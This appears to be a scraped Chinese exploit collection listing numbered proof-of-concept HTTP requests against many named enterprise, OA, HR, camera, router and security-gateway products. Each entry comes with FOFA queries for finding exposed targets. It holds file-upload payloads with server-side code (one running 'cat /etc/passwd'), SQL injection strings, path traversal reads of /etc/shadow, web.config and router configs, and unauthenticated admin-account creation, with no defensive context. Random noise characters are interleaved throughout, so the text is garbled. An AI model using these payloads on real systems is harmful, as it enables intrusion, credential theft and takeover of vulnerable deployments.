<fileFlow>andqbmFnc3phc3d1ZGh0bmhwYXc=</fileFlow>0 [( c: v& }( O8 p5 B
<tag>3</tag>
2 h7 c- z0 o& p2 f+ n</UploadResume>
; I8 O) T$ `" a# z) ]( F H3 p</soap:Body>/ | K8 q; s- m# V9 A% W
</soap:Envelope>
, h) l/ Z6 T1 T9 e4 J' t0 [/ ~
9 U: F6 H' e C2 N9 K l: r
: J6 |" P6 q3 ~% k: x0 ghttp://x.x.x.x/dizxdell.aspx* k5 x1 k S4 I; B
8 U7 {% v, M) n( B v
162. 和丰多媒体信息发布系统 QH.aspx 任意文件上传
; i2 H1 i) _- Z/ ?2 WFOFA: app="和丰山海-数字标牌"( I' D- a1 S- B O9 {! a( f
POST /QH.aspx HTTP/1.1
' _! B- S' P# I7 q# D/ ~2 n, ^! uHost: x.x.x.x' Q q \+ P( k9 t3 h/ G
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.04 J4 W# k% O1 y6 ^
Connection: close
6 G1 g( L2 o3 S5 ?Content-Length: 583& k8 H3 N4 _# F3 c2 J3 J/ D6 g
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryeegvclmyurlotuey
# r. l0 o* s! O4 E3 L9 i- hAccept-Encoding: gzip
: j" @9 S9 `; _2 [0 ^4 S3 \, G: b
0 T, J) N/ h, Z" p9 d------WebKitFormBoundaryeegvclmyurlotuey N/ N0 [3 I* E$ |* M; w
Content-Disposition: form-data; name="fileToUpload"; filename="kjuhitjgk.aspx"# ]8 _! p" V m. D; y9 `- l `
Content-Type: application/octet-stream
" r; r- Q# r O; n
2 a. F: Q# N+ h1 A<% response.write("ujidwqfuuqjalgkvrpqy") %>
4 w' K Q4 P8 r* m$ f3 h! W------WebKitFormBoundaryeegvclmyurlotuey, E w& }% G9 Q# g6 `
Content-Disposition: form-data; name="action"
& r+ \) ?% t% E
2 Y4 n3 @& h# L5 q8 c$ I. b/ x2 bupload
2 x2 Z5 w5 q! O" G& R( O9 Z------WebKitFormBoundaryeegvclmyurlotuey# h7 A% d( s5 R8 `7 w- s6 O; F
Content-Disposition: form-data; name="responderId"# B( `* G, Q, O2 J( v( M) a" Z4 R
7 K8 z* Z {! vResourceNewResponder
8 k* e- L, w4 | U- S------WebKitFormBoundaryeegvclmyurlotuey; A, Y- i: Z8 u
Content-Disposition: form-data; name="remotePath"% o" {& \ n5 v3 _% i
9 {" b5 f, D5 s
/opt/resources
2 [) F# O" D: H$ \4 v+ f------WebKitFormBoundaryeegvclmyurlotuey--
: f. E$ C. h$ K5 ]7 E# q. X% J# Q- U
8 J. X3 [0 z$ I3 Q, T
http://x.x.x.x/opt/resources/kjuhitjgk.aspx
/ U- x0 j* H4 l4 B1 Q+ w O- t O5 Y2 Z1 I" }, [* E
163. 号卡极团分销管理系统 ue_serve.php 任意文件上传
8 V0 |; `+ K( vFOFA: icon_hash="-795291075"! y$ E2 V( V8 y# f
POST /admin/controller/ue_serve.php?action=image&encode=utf-8 HTTP/1.1) j# m! ]" k2 m7 i+ j
Host: x.x.x.x& r( j+ h* T$ Z& A( s& ]* T4 G
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.5249.62 Safari/537.36
1 {* o" [3 `9 Q) |, q- ^- UConnection: close4 `$ b% w+ S+ N8 f1 f3 v' y8 i
Content-Length: 293
0 z! t3 ~, H. z% h& nAccept: */*
z0 g {% f! K t5 xAccept-Encoding: gzip, deflate: ^! z: @0 [6 K
Accept-Language: zh-CN,zh;q=0.9
9 W8 d8 d1 |: VContent-Type: multipart/form-data; boundary=----iiqvnofupvhdyrcoqyuujyetjvqgocod
4 L# ~4 }* ^! X6 }9 {0 e
( X6 |; s- n+ U! J8 x------iiqvnofupvhdyrcoqyuujyetjvqgocod. Z! v1 H4 n \7 c* I
Content-Disposition: form-data; name="name"
7 p" y: J) u" c$ b) S6 j1 [$ X9 `$ Z
1.php
6 y/ f3 w7 I9 X/ J3 b: _9 J' e------iiqvnofupvhdyrcoqyuujyetjvqgocod
* z [5 l& h, M5 o4 bContent-Disposition: form-data; name="upfile"; filename="1.php"
$ u3 c) ]( @1 L1 j2 BContent-Type: image/jpeg; w" i/ K h; f* M4 A/ l
. O8 `8 {- s' m/ d
rvjhvbhwwuooyiioxega
- l* t9 y$ \$ X# T------iiqvnofupvhdyrcoqyuujyetjvqgocod--+ ]6 b- r; H6 ~9 V; U- ?) ?+ B: L
2 h7 E7 l! l! B" \4 [1 ^ V9 J
3 \: z8 g' [7 R5 _164. 慧校园(安校易)管理系统 FileUpProductupdate.aspx 任意文件上传
$ H$ @/ E$ _1 _/ t3 ?. J& vFOFA: title="智慧综合管理平台登入"
4 Y1 ]3 d/ x3 }7 GPOST /Module/FileUpPage/FileUpProductupdate.aspx HTTP/1.19 J% n: f# d1 g/ `% e
Host: x.x.x.x& G6 A) n; P; c4 y' {+ X1 N7 L
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
2 c/ T& ^* C1 r: x9 LContent-Length: 288
3 x6 ]- F3 U4 P% E/ | v7 [; CAccept: application/json, text/javascript, */*; q=0.01" {7 Q7 n3 R) ]2 T0 \) T! _9 m
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2,
* j% Z/ V' H: O* l3 Q8 HConnection: close
; D0 z; Q2 k$ b ?7 A uContent-Type: multipart/form-data; boundary=----dqdaieopnozbkapjacdbdthlvtlyl _- Z- C7 Z8 N+ b' g( G
X-Requested-With: XMLHttpRequest7 M! F. m! y! e e! R
Accept-Encoding: gzip1 @2 q" T' P& u$ L i1 @
! i2 u$ I5 d; Y; O# ~" S; e------dqdaieopnozbkapjacdbdthlvtlyl
6 t: B9 x( x; t6 g, _6 J" u! O2 XContent-Disposition: form-data; name="Filedata"; filename="qaz.aspx"+ J8 G" O, J ^' M7 {/ n. Q: N
Content-Type: image/jpeg
/ r7 S5 a* v- L/ f$ ^0 R
, i, T. p" i+ E' X) E$ e<%@Page Language="C#"%><%Response.Write("aitwpovoxwtgixpfqiys");System.IO.File.Delete(Request.PhysicalPath);%>
6 ?, y$ }$ F3 O# B------dqdaieopnozbkapjacdbdthlvtlyl--: e! r7 C; N$ A: u7 _
7 A6 r" C# T# z
& s. ^. y# l+ Q. L( x! ehttp://x.x.x.x/Upload/Publish/000000/0_0_0_0/update.aspx
2 l# Q6 i+ V- Q4 K0 ?! w- J: f/ f! Z8 t3 S* q0 o
165. OrangeHRM 3.3.3 SQL 注入
' X2 D$ e/ X+ l+ H) U8 p2 s' aCVE-2024-36428
% e" E% o' I/ |/ c2 NFOFA: app="OrangeHRM-产品"
: u1 o. A! f" }# c) M! {URL:https://192.168.1.28/symfony/web ... e&sortOrder=ASC,(SELECT (CASE WHEN (5240=5240) THEN 1 ELSE 5240*(SELECT 5240 FROM INFORMATION_SCHEMA.PLUGINS) END))$ M$ g. Z6 W* {) w3 [6 `: j
! g* ?4 E a8 R @0 l
@) K# R4 D# Q F/ K/ L166. 中成科信票务管理平台SeatMapHandler SQL注入
9 a: r" V- m ?6 p( e( YFOFA:body="技术支持:北京中成科信科技发展有限公司"/ Y9 p. `. S: C A; x2 w7 z$ @# o9 J
POST /SystemManager/Comm/SeatMapHandler.ashx HTTP/1.1% B# o" S+ I2 T- U7 j
Host:
, |" Y6 x5 N0 y4 |( V. uPragma: no-cache, X- A1 B9 k" ^2 [1 N
Cache-Control: no-cache
! Z, _7 f" T1 R5 D4 rUpgrade-Insecure-Requests: 13 ^4 _7 ~# H9 v) Y! e1 X
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.366 E0 s* ^% V, ]0 E7 s
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
2 Z: Q9 v" c6 {7 y2 o# jAccept-Encoding: gzip, deflate
' w; p6 c2 H: a. Z* L5 U' YAccept-Language: zh-CN,zh;q=0.9,en;q=0.8
9 [: L) \3 T% H# RCookie: ASPSESSIONIDCCRBRCTD=LHLBDIBAKDEGBCJGKIKMNODE
1 R) z" i& v% s- C" m: A' XConnection: close
- @4 ^; |- t$ i& fContent-Type: application/x-www-form-urlencoded
3 d8 ?1 D2 A* {8 jContent-Length: 89
1 r! _7 V2 d3 V, }5 _- l, a* N, t3 U9 M1 o6 b! E1 e0 X
Method=GetZoneInfo&solutionNo=%27+AND+4172+IN+%28SELECT+%28CHAR%28104%29%2BCHAR%28101%29%2BCHAR%28108%29%2BCHAR%28108%29%2BCHAR%28111%29%29%29--+bErE
4 Y# P! `) x+ x7 A+ |) n
5 e% _ d+ j8 x; ^7 E' d/ n# ~
$ q1 P4 B+ X! p167. 精益价值管理系统 DownLoad.aspx任意文件读取
' h' @+ f" m/ [FOFA:body="/ajax/LVS.Core.Common.STSResult,LVS.Core.Common.ashx"
& g! v9 i) Y8 M& u7 L' C1 o* `GET /Business/DownLoad.aspx?p=UploadFile/../Web.Config HTTP/1.1. @9 g9 k) l& Q \( Q
Host:
: e* u# ?: n f; M3 q- c$ v& @User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36. _- ]: d+ z6 \) m: Y8 {; D
Content-Type: application/x-www-form-urlencoded, |- H* {! T2 }: T
Accept-Encoding: gzip, deflate
" d. y9 B4 D: u, m: UAccept: */*
3 N- V* R3 A" ~/ }, @4 n6 pConnection: keep-alive% u+ y8 S* I7 n. O7 T3 q$ x
# z6 d. C b6 I! I0 _1 I) P0 H* t. A i, j+ ]# _
168. 宏景EHR OutputCode 任意文件读取
0 I b' J9 {$ Z1 aFOFA:app="HJSOFT-HCM"' T$ Y0 R) G( O+ f/ G+ k
GET /servlet/OutputCode?path=VHmj0PAATTP2HJBPAATTPcyRcHb6hPAATTP2HJFPAATTP59XObqwUZaPAATTP2HJBPAATTP6EvXjT HTTP/1.1
9 b Z% d8 d, g4 IHost: your-ip% n" O- ?" K- f
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36
2 Y8 r) [/ I8 z/ F3 iContent-Type: application/x-www-form-urlencoded( m- R3 K' I3 U4 Z v
Connection: close7 F- D3 H8 Q. H9 c7 n
% z, M5 `; h5 I
' f- M; T3 D; f% A% k
: g4 }/ \, o8 V o& b169. 宏景EHR downlawbase SQL注入
$ ^) i$ M4 ]5 b* `1 l. V: Q" JFOFA:app="HJSOFT-HCM"
" E7 A! i+ h Z8 @9 Y; lGET /templates/attestation/../../selfservice/lawbase/downlawbase?id=1';WAITFOR+DELAY+'0:0:5'--+ HTTP/1.1
# Q8 G- O' ?: s6 b* p+ BHost: your-ip0 H2 F8 ~/ V* ~: n
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
5 D: _8 I9 {, v0 o/ b; fAccept: */*& K3 f; Z# Y6 d0 v% r2 \/ ?0 K+ E
Accept-Encoding: gzip, deflate
$ W0 _; c) N/ PConnection: close
3 A" J1 [& g. \( `) p
& m! m: S5 D6 P' t7 t- y+ {" v3 ?1 V* E7 X
) X- s, x" Y. W1 J0 D
170. 宏景EHR DisplayExcelCustomReport 任意文件读取3 j& }1 m+ h- k0 Y3 M5 |2 `0 A
FOFA:body="/general/sys/hjaxmanage.js"$ M% `$ i4 m( E% N
POST /templates/attestation/../../servlet/DisplayExcelCustomReport HTTP/1.1
: Z" A) f4 {1 K/ x$ H& {Host: balalanengliang
( \: r5 {& E* }. h- C3 HUser-Agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36" x- t. r9 M* Z0 K, T& p+ I, T! \
Content-Type: application/x-www-form-urlencoded. ?! m! l, U2 O/ F* @. Y$ e
: Z% T4 P- k+ c: R7 P
filename=../webapps/ROOT/WEB-INF/web.xml
. \' I. M" i6 ~* O8 ] R N; [4 I$ A! n k- U, D) R& o
: }; f1 ^2 t8 Q5 n* L
171. 通天星CMSV6车载定位监控平台 SQL注入
% e$ }! U# {2 \- @' w! CFOFA:body="/808gps/"
3 n% S2 v+ e7 h9 h' \2 w% YGET /run_stop/delete.do;downloadLogger.action?ids=1)+AND+(SELECT+5394+FROM+(SELECT(SLEEP(5)))tdpw)--+&loadAll=1 HTTP/1.17 F% A" A' G! n- N3 G
Host: your-ip
( h9 K% ^) y$ v+ ~* e% Y& S& vUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/110.0
! A" N4 j+ t7 J. |Accept: */*1 t% C4 H2 m) d/ R. L
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 g3 |( Z8 U# U# e j
Accept-Encoding: gzip, deflate- M, Q1 v$ u6 k( y9 z( r5 D
Connection: close7 ]- `& _2 i s5 `
+ }: `/ u7 J1 u5 t- j' \+ i' A0 B. R4 F; m4 e& o: z
( y" |7 H/ n; O0 M172. DT-高清车牌识别摄像机任意文件读取$ D1 D0 \1 i1 R' H& j* T5 c
FOFA:app="DT-高清车牌识别摄像机"
* p/ ~ g3 U) g( ]GET /../../../../etc/passwd HTTP/1.1
3 S& _% T3 V5 Q. [* a o( @! m- w; HHost: your-ip- c8 _6 c! x% K' i
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36; R+ z r" W/ s: G; V; L
Accept-Encoding: gzip, deflate
& r' j3 b& x! ~# d% i/ ZAccept: */*6 X5 q- i$ u, I3 p
Connection: keep-alive
. w# @* H# W# r" ^3 v5 a$ U( R
7 I {( N F% t& W$ N! w! K, _% ~2 O$ A- J3 v* ]' I3 ?% L' Y
$ L$ l# L& y- h: u! j, {+ \
173. Check Point 安全网关任意文件读取, h5 _, j0 ]3 j8 t4 S) L
CVE-2024-24919# u+ s# M S5 F9 {8 @# Y
FOFA:app="Check_Point-SSL-Network-Extender") N% W( L) \: l
POST /clients/MyCRL HTTP/1.1
$ M- X+ R" v) U" n! W0 o% K( oHost: your-ip
6 S2 q+ E' C! Q- E# M/ qContent-Type: application/x-www-form-urlencoded4 a2 y4 h0 o" m1 H" l1 A8 O
/ |# G& i1 Z7 J/ M" P+ t, o$ s9 u7 BaCSHELL/../../../../../../../etc/shadow
1 C/ W+ s3 Z8 @; t7 p( e5 ~) L# [5 a F& w
) h1 i0 Q$ S3 [6 l+ A: s, {
5 r- S& I+ r5 r; D9 U% J
174. 金和OA C6 FileDownLoad.aspx 任意文件读取4 h8 H6 T1 R$ ?; c
FOFA:app="金和网络-金和OA"( G+ Y0 a4 L: B1 x. u
GET /c6/JHSoft.Web.CustomQuery/FileDownLoad.aspx?FilePath=../Resource/JHFileConfig.ini HTTP/1.1
+ x0 Z9 Z9 f h3 g4 THost: your-ip# c6 T/ i9 V1 {0 K p& [" v
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36& N4 D: t/ x0 ^/ q0 Z) g) k$ c
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.76 U+ s# r N% E k) |4 m3 S
Accept-Encoding: gzip, deflate, br3 {! U7 H, ~' ^4 i2 \$ @" x
Accept-Language: zh-CN,zh;q=0.94 k5 \- `, i9 N
Connection: close
: d! c! S1 k' U+ O
( A j7 r5 J7 D' w& G8 ~+ @" Q) _- {) H
' m* R7 w/ _/ g9 g
7 J- X w8 z4 S175. 金和OA C6 IncentivePlanFulfill.aspx SQL注入
) Q1 z0 S; h: ^. ?4 i" @FOFA:app="金和网络-金和OA"
2 d1 }9 n. b* _3 EGET /C6/JHSoft.Web.IncentivePlan/IncentivePlanFulfill.aspx/?IncentiveID=1%20WAITFOR%20DELAY%20'0:0:5'--&TVersion=1 HTTP/1.1
I1 }! ? ?2 Y! I& qHost:
- s7 {2 L. T! n1 e' I. i( B8 _User-Agent: User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
; q! m1 k, q$ yAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.84 v/ H5 [9 l7 S
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.26 O& |" k; p* f8 r+ a
Accept-Encoding: gzip, deflate3 |( w9 M2 f, M2 i# t! J
Connection: close! |3 M$ ?# |1 l, o0 t8 \
Upgrade-Insecure-Requests: 1# y' G7 [4 a( e0 e
8 A3 }! w+ f2 m# e8 j9 R3 a, |
$ a$ q5 y( L4 L* ?+ o176. 电信网关配置管理系统 rewrite.php 文件上传
5 f n% y- V: _/ @ F1 B- ?FOFA:body="img/login_bg3.png" && body="系统登录"+ r f7 y6 ^" s' F% z+ k
POST /manager/teletext/material/rewrite.php HTTP/1.1 u4 _, G& |5 p9 ]5 I
Host: your-ip9 T4 p% M% \! W! B
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0' m4 o, I' ?# S1 Q- q0 ~
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryOKldnDPT# ] N6 y- Q* x% v, |+ p
Connection: close
/ u$ s: i# n) m" Q3 x7 W' F# R, i( c( [, b
------WebKitFormBoundaryOKldnDPT- Z% o. Q' P3 e; y3 ?; H# Z3 j) o' I8 @
Content-Disposition: form-data; name="tmp_name"; filename="test.php"! i" G" K' ~, D! K6 p+ H
Content-Type: image/png
5 T+ ]+ I B* f1 }1 g
3 A1 q* ^ b. E1 D. }% V# W) L. z<?php system("cat /etc/passwd");unlink(__FILE__);?>
: x0 T" J+ F; ?& h# r0 m2 ], l------WebKitFormBoundaryOKldnDPT' }! E/ k, O! S6 b8 Y
Content-Disposition: form-data; name="uploadtime"2 W# N; ?& c; o/ r! Q
7 g4 c3 a" U, |: I! G
& s; `! R* b2 q- P9 k------WebKitFormBoundaryOKldnDPT--( a* N3 L; G8 c! b2 n! V
7 M& q8 @4 S0 M: A* g$ Y, J3 o0 n' G0 e- L; r
7 F- }8 r! d2 U! ]2 ]8 q& c
177. H3C路由器敏感信息泄露 g0 j2 U6 L$ \ t( u
/userLogin.asp/../actionpolicy_status/../ER8300G2.cfg' [& l, i( e- W% A1 {2 Y& L+ w; L
/userLogin.asp/../actionpolicy_status/../M60.cfg
5 }# h! N Z! R- U* m' ? [/userLogin.asp/../actionpolicy_status/../GR8300.cfg7 S: Q; m2 H6 z$ Z1 n& a( w7 w3 `% v
/userLogin.asp/../actionpolicy_status/../GR5200.cfg
& F+ M8 o4 z) T( ~! _/userLogin.asp/../actionpolicy_status/../GR3200.cfg) g3 A P6 i! `0 k s0 T0 ?
/userLogin.asp/../actionpolicy_status/../GR2200.cfg8 z9 q) n, b) T8 B. j$ ^) d
/userLogin.asp/../actionpolicy_status/../ER8300G2-X.cfg
2 f' e- @, Z7 D4 P: [) ?. n5 g/userLogin.asp/../actionpolicy_status/../ER8300G2.cfg/ ?) @* y1 x2 h5 c
/userLogin.asp/../actionpolicy_status/../ER6300G2.cfg; Y0 |/ e8 I% t/ l D
/userLogin.asp/../actionpolicy_status/../ER5200G2.cfg
- Z' z7 ? A& D2 M) y2 G" C, Q/userLogin.asp/../actionpolicy_status/../ER5200.cfg0 `) k* q, ~& s) `, q1 m
/userLogin.asp/../actionpolicy_status/../ER5100.cfg
. d+ E ]' F9 ~/userLogin.asp/../actionpolicy_status/../ER3260G2.cfg
# k8 _, E5 H" i* J) Z* S& ^/userLogin.asp/../actionpolicy_status/../ER3260.cfg4 g6 c5 N( Z- D& H& t: J
/userLogin.asp/../actionpolicy_status/../ER3200G2.cfg
5 W6 Y% g9 W8 J' r% F e+ [. g9 K/userLogin.asp/../actionpolicy_status/../ER3200.cfg$ \! V c$ ?5 n8 M. ?9 w; a
/userLogin.asp/../actionpolicy_status/../ER3108GW.cfg
- K" z6 h5 A+ }3 y/userLogin.asp/../actionpolicy_status/../ER3108G.cfg9 N) j9 o8 P/ B+ n r/ A
/userLogin.asp/../actionpolicy_status/../ER3100G2.cfg* p: t/ ]# h2 V% w8 x4 m
/userLogin.asp/../actionpolicy_status/../ER3100.cfg
3 a: C2 i5 l; I' Z3 I2 R, E F4 J/userLogin.asp/../actionpolicy_status/../ER2200G2.cfg
- b- K3 s# K6 _& K( y) H/ |' q% r8 M' n# T" S
i6 V7 G0 ^; w l- E/ n3 D% e7 g178. H3C校园网自助服务系统-flexfileupload-任意文件上传8 i/ o) X( \" H) N$ j; j3 I
FOFA:header="/selfservice"
, R: w- E$ p' }, t0 B0 G2 ePOST /imc/primepush/%2e%2e/flexFileUpload HTTP/1.11 a! [/ `. u6 B8 c# ]( q+ l5 u
Host:, a1 J0 y P: v7 Q/ J! r. `2 A' u
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.368 m& `& m) r" P, `% p0 T
Content-Length: 252 \8 ^1 M* Q* _2 N5 I1 m, r
Accept-Encoding: gzip, deflate U3 { x$ h x
Connection: close
" [5 O7 b& G6 a- \/ wContent-Type: multipart/form-data; boundary=---------------aqutkea7vvanpqy3rh2l
, g3 D- @$ W1 b. R8 ^3 H-----------------aqutkea7vvanpqy3rh2l: E0 f- t6 K$ K9 n$ x4 L F+ J
Content-Disposition: form-data; name="12234.txt"; filename="12234"
$ s: L n( c. ?& X" y6 pContent-Type: application/octet-stream7 }* f$ V! c5 B+ ?' h: c- h
Content-Length: 255: z2 P' v" H% M. U
! x7 w/ r6 u# F6 Z% W
122348 C' ?: x I: b
-----------------aqutkea7vvanpqy3rh2l--
8 D" H: v; m p1 @" U# q c+ Z
' I, g3 ~7 b6 t& N: G: r. G6 Z! j# U) b3 n( j" n
GET /imc/primepush/%2e%2e/flex/12234.txt+ c( _# K- Y4 }# c9 A, ^
& ?! N4 Z* J, j$ {8 a" R/ s
6 q4 h! @; u% E/ t% N179. 建文工程管理系统存在任意文件读取
, ~; F H+ h- s% ?. d: ~POST /Common/DownLoad2.aspx HTTP/1.1# @9 j5 O& S( k1 H0 g* j2 x
Host: {{Hostname}}
, L7 n1 ^ W* n7 _Content-Type: application/x-www-form-urlencoded3 N& t+ H, p/ w' b; z& F
User-Agent: Mozilla/5.0
) }9 w& B( L5 y8 o
# Z( j' l w1 p& qpath=../log4net.config&Name=5 L5 D! V- G: l( ^
; q k/ `' ?* S
# Y6 A u; u w& o
180. 帮管客 CRM jiliyu SQL注入
, X M1 i" ~* w/ f6 W5 m. aFOFA:app="帮管客-CRM"# ~" S8 Q& b) A3 D' e* _ W/ g" ?' v
GET /index.php/jiliyu?keyword=1&page=1&pai=id&sou=soufast&timedsc=激励语列表&xu=and%201=(updatexml(1,concat(0x7e,(select%20user()),0x7e),1)) HTTP/1.1" O+ I1 ^' e( k- ?, m
Host: your-ip
. d, U- A- s+ `* K7 M# eUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
9 V6 Y0 x7 Q" g6 xAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
2 s: ]1 C2 B5 I: a4 o. E( oAccept-Encoding: gzip, deflate' m; ^. X$ K6 H4 Q; y
Accept-Language: zh-CN,zh;q=0.9
6 G) @ i7 z6 o& ~! OConnection: close
' S6 T0 }" t. U9 t' J- v1 l' Y1 v& S, A1 n+ ^& w
5 G3 q' y, q7 H9 R8 Q T9 L181. 润申信息科技企业标准化管理系统 UpdataLogHandler.ashx SQL注入( e' C( @% t1 Z
FOFA:"PDCA/js/_publicCom.js"
( Z0 q( s, \. Q4 Y4 @POST /PDCA/ashx/UpdataLogHandler.ashx HTTP/1.1
- G# N, I& b$ O" N: H R# _. CHost: your-ip
6 d3 |% V4 r# A- L3 |User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
1 m" o0 Q" C2 o+ m! H1 K3 ^: J$ FAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.79 _- H c4 }3 V# D
Accept-Encoding: gzip, deflate, br
/ x4 r' z7 n0 y; m, p- Y& K( qAccept-Language: zh-CN,zh;q=0.9* |3 ]7 ~8 M1 W5 {5 M1 m
Connection: close
0 o- z' z i2 T- mContent-Type: application/x-www-form-urlencoded. ^# \( U. D# Y$ @
0 J0 l4 ], \5 f4 N/ z6 p/ h9 w: G% W4 l* s$ z
action=GetAll&start=' WAITFOR DELAY '0:0:5'--&end=&code=11&type=2&page=1&rows=20
. Q. q* C2 H9 x" p" d2 ~! V! r/ ^! a' X$ }! q' v3 `" W
' r) U$ \5 o2 L' g
182. 润申科技企业标准化管理系统AddNewsHandler.ashx 任意用户创建
0 T& {% A: L" o u4 ]FOFA:"PDCA/js/_publicCom.js"
( U2 y' I) p; ]9 B* y2 C8 [POST /PDCA/ashx/AddNewsHandler.ashx?action=Adduser HTTP/1.1% e! d' E% R5 F0 h- \
Host: your-ip
1 H6 \/ s9 o' X9 D2 OUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.362 H8 q; I$ [* n; H2 f, ?: j
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7; e5 \ P& p8 V; {' Z. \
Accept-Encoding: gzip, deflate, br% B/ r% E( D; {8 {
Accept-Language: zh-CN,zh;q=0.9
' C7 P5 w( q8 D- ^9 g" XConnection: close
6 P" H8 s, C+ g& AContent-Type: application/x-www-form-urlencoded
; w- R0 w) |$ N, e. |4 _% L0 s/ z& v! V, F6 a: H8 a) @
, V7 S8 @. p; @* ^
username=test1234&pwd=test1234&savedays=1
2 A2 F7 K' |% |% B2 ~
: U0 l3 o1 b! c' U( [; O# r; Z+ q$ c/ c
! D' J+ w5 U. t, A* }: G4 u% q5 y183. 广州图创图书馆集群管理系统 updOpuserPw SQL注入0 i' x: B2 j8 K, U# Z2 J1 v( [
FOFA:body="interlib/common/" || body="Interlib图书馆集群管理系统" || body="/interlib3/system_index" || body="打开Interlib主界面"
* v6 o/ y5 e$ _5 E) h! aGET /interlib3/service/sysop/updOpuserPw?loginid=admin11&newpassword=Aa@123456&token=1%27and+ctxsys.drithsx.sn(1,(select%20111111*111111%20from%20dual))=%272 HTTP/1.1
H; R, p z& HHost: your-ip+ Q( p! z, q3 W! p* i: R& P8 s
User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36
( z3 |: h$ X" uAccept-Charset: utf-83 y: ~9 W; A! z# B; K
Accept-Encoding: gzip, deflate z4 c! R" v$ @ V; X
Connection: close0 D$ B! L$ p' H) @% L* h: c( a, r$ {
`$ k- n; }, x, W
4 f# x. \3 f- {$ ?' }, W+ E
184. 迅饶科技 X2Modbus 网关 AddUser 任意用户添加
, ]1 {1 M# C* |6 N! F) wFOFA:server="SunFull-Webs"/ ~# X1 w2 c: b* m
POST /soap/AddUser HTTP/1.1
' n0 ?, L9 \7 f* D8 XHost: your-ip; n# x: K) i. ?# V1 y$ T. m
Accept-Encoding: gzip, deflate' i, a6 l( I& M$ B5 i
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.00 s" n" \9 `6 {1 _4 f$ L
Accept: application/xml, text/xml, */*; q=0.01
" j% ^/ z# J- s* o9 F* j8 K, U( W) ZContent-Type: text/xml; charset=utf-8 ]3 [( \7 u$ E) P$ t
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.26 u1 U0 a6 e0 P
X-Requested-With: XMLHttpRequest
* F' ^' a- h4 C- b& r7 ]% d! G; ^* J+ z! X
) s8 X& C6 H/ Q- L- J3 ~4 q Jinsert into userid (USERNAME,PASSWORD,PURVIEW,LOGINDATE,LOGINTIME) values('root','123456','4','2024-5-6','11:7:56')
9 C2 o Q! a- U; ^
& K5 L5 m$ N; r: Z- i9 E$ u7 `6 c) ?# e# Z4 A
185. 瑞友天翼应用虚拟化系统SQL注入# ?/ v* C' o2 O7 o, a
version < 7.0.5.1
8 Q2 Y' y, m( l% bFOFA:app="REALOR-天翼应用虚拟化系统"
